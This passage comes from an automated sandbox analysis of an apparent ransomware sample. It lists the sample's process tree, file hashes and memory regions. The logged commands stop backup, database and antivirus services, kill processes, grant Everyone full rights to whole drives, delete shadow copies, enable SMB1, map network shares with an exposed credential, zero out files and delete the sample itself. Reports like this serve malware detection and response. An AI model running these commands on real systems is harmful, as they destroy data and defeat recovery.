      "net.exe" stop SQLAgent$VEEAMSQL2012 /y
      PID:2724
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
        PID:2832
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_update_64 /y
      PID:3580
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_update_64 /y
        PID:1872
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      PID:1384
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        PID:1336
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$TPSAMA /y
      PID:4000
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
        PID:2608
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamBrokerSvc /y
      PID:2132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamBrokerSvc /y
        PID:2332
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
      PID:3636
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
        Suspicious use of WriteProcessMemory
        PID:108
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLSERVERAGENT /y
      PID:3036
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLSERVERAGENT /y
        PID:2996
    • C:\Windows\system32\net.exe
      "net.exe" stop AcronisAgent /y
      PID:2124
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        PID:2772
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:2296
    • C:\Windows\system32\net.exe
      "net.exe" stop vapiendpoint /y
      PID:2304
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop vapiendpoint /y
        PID:2924
    • C:\Windows\system32\net.exe
      "net.exe" stop mssql$vim_sqlexp /y
      PID:2604
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
        PID:2880
    • C:\Windows\system32\net.exe
      "net.exe" stop WRSVC /y
      PID:3820
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop WRSVC /y
        PID:3292
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLTELEMETRY$ECWDB2 /y
      PID:2704
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
        PID:3832
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKeyServiceHelper /y
      PID:2364
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
        PID:572
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      PID:2756
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecManagementService /y
      PID:1212
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        PID:2208
    • C:\Windows\system32\arp.exe
      "arp" -a
      PID:2464
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PROFXENGAGEMENT /y
      PID:2372
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
        PID:3416
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecRPCService /y
      PID:3200
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        PID:3868
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SBSMONITORING /y
      PID:2676
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
        PID:3048
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3828
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2272
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2504
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1356
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3888
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3124
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2396
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2796
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3268
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3128
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2808
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3020
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld-nt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM winword.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2480
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3272
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM visio.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2392
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM powerpnt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2316
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM msftesql.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3780
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3100
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM outlook.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:936
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM msaccess.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2088
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2516
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3068
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2492
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3196
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3188
    • C:\Windows\system32\net.exe
      "net.exe" stop DCAgent /y
      PID:2356
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DCAgent /y
        PID:2952
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SHAREPOINT /y
      PID:2136
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
        PID:4244
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      PID:2732
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        PID:3600
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3388
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:1080
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2084
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      PID:964
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:940
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3848
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM synctime.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3680
    • C:\Windows\system32\net.exe
      "net.exe" stop AVP /y
      PID:2328
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AVP /y
        PID:2116
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SBSMONITORING /
      PID:3144
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
        PID:2908
    • C:\Windows\system32\net.exe
      "net.exe" stop Antivirus /y
      PID:2972
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Antivirus /y
        PID:3984
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKeyScheduler /y
      PID:2484
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKeyScheduler /y
        PID:3800
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLTELEMETRY /y
      PID:4040
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLTELEMETRY /y
        PID:3192
    • C:\Windows\system32\net.exe
      "net.exe" stop stc_raw_agent /y
      PID:2672
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop stc_raw_agent /y
        PID:2388
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
      Suspicious use of AdjustPrivilegeToken
      PID:888
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4052
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM dbeng50.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3484
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c net view
      PID:752
      • C:\Windows\system32\net.exe
        net view
        Discovers systems in the same network
        PID:4360
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3920
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3508
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mbamtray.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3928
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM zoolz.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3940
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM xfssvccon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4020
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3976
    • C:\Windows\system32\icacls.exe
      "icacls" "C:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:2284
    • C:\Windows\system32\icacls.exe
      "icacls" "Z:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:524
    • C:\Windows\system32\icacls.exe
      "icacls" "D:*" /grant Everyone:F /T /C /Q
      Modifies file permissions
      PID:928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
      Suspicious use of AdjustPrivilegeToken
      PID:2344
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      Kills process with taskkill
      PID:3056
    • C:\Windows\system32\arp.exe
      "arp" -a
      PID:5060
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.10\Users /USER:d.rustamov 64446846
      PID:4336
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.10\Users /USER:
      PID:4364
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.39\Users /USER:
      PID:3316
    • C:\Windows\system32\net.exe
      "net.exe" use \\10.7.0.39\Users /USER:d.rustamov 64446846
      PID:2968
    • C:\Windows\system32\net.exe
      "net.exe" use "\\MRBKYMNO\" /USER:d.rustamov 64446846
      PID:3036
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3683.bat
      PID:2216
    • C:\Windows\system32\net.exe
      "net.exe" use "\\MRBKYMNO\" /USER:
      PID:4600
    • C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
      Opens file in notepad (likely ransom note)
      Suspicious use of FindShellTrayWindow
      PID:4592
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe
      Deletes itself
      PID:3344
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        PID:4244
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      PID:2152
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.7 -n 3
        Runs ping.exe
        PID:4076
      • C:\Windows\system32\fsutil.exe
        fsutil file setZeroData offset=0 length=524288 “%s”
        PID:2328
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    PID:2460
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "495509003210231438056457937816027281691098293190-187288732314128356142146993008"
    PID:2508
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "130648841460027729-1877919121939594528-114490520014118598061498087057442901440"
    PID:2500
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    PID:1356
  • C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    PID:2696
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "18034369721979009320488044411593999301-17827841872081934220936431303622620552"
    PID:2112
    • C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      PID:2268
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-88300685815815162401225110152-1840254462-197679409511698044921976808197-2074448225"
    PID:3724
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "178399211049532893344164614215042801241815335873-70926396820664123671835499644"
    PID:3524
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1177182519-163407135017851178491722587936-35572988324935742018180592211101427827"
    PID:3432
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "113754351184479920633952647-5278228551255207793-1829398366-95734888458949381"
    PID:2064
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1807060271418463034-3179165801094417392-1848267739-16020750962100231670143128254"
    PID:3288
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2143241986-1513979916-853821850-2091479951-1432388280-243640775-153425933103784960"
    PID:2568
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1748787083-20254476231203153414-29675323-1127320453-416102942-1741872149257248894"
    PID:2140
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1092060117-288063398-17263171381973385389-1576687708-1105001086-1758608163959861799"
    PID:2744
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-941407417102771084277267979611477969665880117-2636039831613261508306219869"
    PID:2872
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "17846775241180888495-1168371101084993478-657577720-76359511015077902701942432868"
    PID:4012
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-272571851798147171-84999065620274222861073376794-6031474424807878791812184394"
    PID:2864
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-320566445-171677215253238862-7450757275595804071194008991-814497435-516194514"
    PID:2960
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1414767290-831466543-18536519167789529361441058971-1835366081-1536457981408143095"
    PID:2856
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "19445464301444836803411788499-168626073519645534811553744369-1436492765-591755977"
    PID:3988
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "161949364-11021964251454162460-1633048453-1917134264-3134212531175797488-1263479598"
    PID:3040
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-516230278-15943610439927081571727147353-1330982828-1656930711-1458856660-536199717"
    PID:560
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-538998337-1996176807-4917388171921860218-271890875758641635-1968505968-1729221781"
    PID:2944
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-254458296-5380881931791860969-908709736558998385-271494614-911504158-1045063791"
    PID:1624
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1398157670459663594-21032467641790456670-17482385961110391313-5090538791709718337"
    PID:2588
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-12895280794076594311869020782-857101585-4832746102104725668-7589497141823722683"
    PID:2120
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1399143429-375649459-1700794903-190475780198904789347417096-67952581761680221"
    PID:2936
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-119496549-1378514071-209207773618710631561864757182251901231-20174478441075415570"
    PID:2828
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-15469008491166151571-188686056710203705201877085164-201344827-782456547-101026085"
    PID:308
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-9141663412135292374770380922-1439764845-15851718551586378613982160295-1212194643"
    PID:2820
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-17719748891866635239-204767081-166968631485794257911450643641688057945128501146"
    PID:2096
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-371816465-226661153-995430568175375232815381421638134067911909118482-2032159817"
    PID:2928
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2113854270-1977292861-766370917205935730-1469446320633508756-1496991686-1814496363"
    PID:2576
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "682020618-179281898641240142-992705402-1515433608-2045185262-12830365931233237385"
    PID:2436
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "981811285455223837210822801-1594912808-1477327756-1323892102123300599469895568"
    PID:1588
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "128917010-16006121-1596056163-748973429-778914038-1581270318-8585983421255003548"
    PID:2056
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "6881964131181869170-86578583-54084765-7827901851889046511433829789105874986"
    PID:2804
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-429209517-1745564107-1680014279625698335706247876-26902171718504473951165433206"
    PID:2384
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-968253330741258883-16598211292005664218-16507771171822894904-12476734871376943901"
    PID:3176
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-11035219973953527871420524023-2082788469-666533418-2126708420-1269156072-1226252360"
    PID:2776
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "45152621-1877240906-2024413401052347464552197193-687155151-2904294731446951713"
    PID:2768
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1175120708-2037302709886162256-7285756332146255801-1102150727-11998610121073752770"
    PID:2760
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "855078274-9719817552200260875765350839048645844250140961628630799-1060419296"
    PID:2292
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "468055822313556213-2507388121054065767-1722362627263584134-5349309291756489903"
    PID:1636
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "3509726453765834622115779261670257904523494876-1967034842926212078420168571"
    PID:368
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "12472419271379015085-1219758415-6323090621929014301916746751821168781450816266"
    PID:1852
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\ResumeRename.vstx
    Modifies registry class
    PID:3440
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

                      MD5

                      00c21b618f79f924ec1ac1ec111cc0cf

                      SHA1

                      5584f7e04bcf669ef302e630e27ca0dc98a6d84b

                      SHA256

                      9869a35d0f2680b1d34985a178356e6f40567b1a8a2024f2980f629b9395b7f6

                      SHA512

                      a88cab8ca0208abb3e90a83dd5e87b0ee04d9d388da67e9842c296cdc39d32531e77255f52f189b53c631219528ea6e9e0263304781edb906940522fc46c2690

                    • C:\Users\Admin\AppData\Local\Temp\o4uozb5v.exe

                      MD5

                      6f47970bd915ab3d24f0cf5a24223718

                      SHA1

                      791ba6733e718d5289b5e7e13d13efb93ec5033f

                      SHA256

                      2c5817a56e387283e450cf2abeb4c3e97bd53de135219325c104058c533f6b60

                      SHA512

                      fdd894c26079854ee4d02e906bea472b49484cd4293a33edbe6c4c091473ef1ddbeb09669625166a36218501a35467a2013b59e44ee20cbc31050836e89640ac

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                      MD5

                      a485c844233bfbbc02225216182ba2e2

                      SHA1

                      96e6da3e3e0616c563ec66ee60676add0ad4401d

                      SHA256

                      57fc5452ce6227b909d5567ecabf5fc6e1d436d7735f80cbaac0344ff5cd9e90

                      SHA512

                      26fbe7babea0517590f49c294f8ac592dd425e1a273306620f4e2ab8c1c30c81ac2265b06cbb66f61c0c714374c236c8a7c5bf9c408461e62f1046457a46c01b

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                      MD5

                      a71c5fa7dd251d451adfaed3b066efc3

                      SHA1

                      46b8300d97a30a6f3334099c7f61563ec4a5312e

                      SHA256

                      5143085d90af962c1f35b979d27fe35b8fd22e0c0f5d3a72c7f3be1f2428178c

                      SHA512

                      97395d4a2803756f7a81d7a108cefa60c0674cd74f767cccb7db31c7386db38120f01c4e5660a24313ed1ff13646dd1ab2d3a568cc7021a09666360f03d5f3bc

                    • \??\PIPE\wkssvc

                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • memory/108-80-0x0000000000000000-mapping.dmp

                    • memory/308-87-0x0000000000000000-mapping.dmp

                    • memory/412-62-0x0000000000000000-mapping.dmp

                    • memory/528-64-0x0000000000000000-mapping.dmp

                    • memory/560-94-0x0000000000000000-mapping.dmp

                    • memory/652-78-0x0000000000000000-mapping.dmp

                    • memory/664-68-0x0000000000000000-mapping.dmp

                    • memory/664-71-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

                    • memory/684-67-0x0000000000000000-mapping.dmp

                    • memory/792-83-0x0000000000000000-mapping.dmp

                    • memory/860-91-0x0000000000000000-mapping.dmp

                    • memory/888-82-0x0000000000000000-mapping.dmp

                    • memory/888-142-0x000000001AAB0000-0x000000001AAB2000-memory.dmp

                    • memory/888-143-0x000000001AAB4000-0x000000001AAB6000-memory.dmp

                    • memory/888-149-0x000000001A830000-0x000000001A831000-memory.dmp

                    • memory/920-88-0x0000000000000000-mapping.dmp

                    • memory/948-75-0x0000000000000000-mapping.dmp

                    • memory/964-90-0x0000000000000000-mapping.dmp

                    • memory/1048-65-0x0000000000000000-mapping.dmp

                    • memory/1112-63-0x0000000000000000-mapping.dmp

                    • memory/1140-93-0x0000000000000000-mapping.dmp

                    • memory/1196-66-0x0000000000000000-mapping.dmp

                    • memory/1216-89-0x0000000000000000-mapping.dmp

                    • memory/1320-70-0x0000000000000000-mapping.dmp

                    • memory/1336-77-0x0000000000000000-mapping.dmp

                    • memory/1456-72-0x0000000000000000-mapping.dmp

                    • memory/1588-92-0x0000000000000000-mapping.dmp

                    • memory/1604-74-0x0000000000000000-mapping.dmp

                    • memory/1636-76-0x0000000000000000-mapping.dmp

                    • memory/1696-81-0x0000000000000000-mapping.dmp

                    • memory/1756-61-0x000000001AFD0000-0x000000001AFD2000-memory.dmp

                    • memory/1756-59-0x00000000003C0000-0x00000000003C1000-memory.dmp

                    • memory/1768-85-0x0000000000000000-mapping.dmp

                    • memory/1808-69-0x0000000000000000-mapping.dmp

                    • memory/1844-73-0x0000000000000000-mapping.dmp

                    • memory/1852-84-0x0000000000000000-mapping.dmp

                    • memory/1952-86-0x0000000000000000-mapping.dmp

                    • memory/2064-95-0x0000000000000000-mapping.dmp

                    • memory/2072-96-0x0000000000000000-mapping.dmp

                    • memory/2088-97-0x0000000000000000-mapping.dmp

                    • memory/2096-98-0x0000000000000000-mapping.dmp

                    • memory/2120-99-0x0000000000000000-mapping.dmp

                    • memory/2140-100-0x0000000000000000-mapping.dmp

                    • memory/2160-101-0x0000000000000000-mapping.dmp

                    • memory/2180-102-0x0000000000000000-mapping.dmp

                    • memory/2200-103-0x0000000000000000-mapping.dmp

                    • memory/2220-104-0x0000000000000000-mapping.dmp

                    • memory/2240-105-0x0000000000000000-mapping.dmp

                    • memory/2260-106-0x0000000000000000-mapping.dmp

                    • memory/2284-107-0x0000000000000000-mapping.dmp

                    • memory/2332-108-0x0000000000000000-mapping.dmp

                    • memory/2344-133-0x000000001AA50000-0x000000001AA52000-memory.dmp

                    • memory/2344-147-0x00000000023B0000-0x00000000023B1000-memory.dmp

                    • memory/2344-134-0x000000001AA54000-0x000000001AA56000-memory.dmp

                    • memory/2344-131-0x000000001AAD0000-0x000000001AAD1000-memory.dmp

                    • memory/2344-132-0x00000000024C0000-0x00000000024C1000-memory.dmp

                    • memory/2344-130-0x00000000022E0000-0x00000000022E1000-memory.dmp

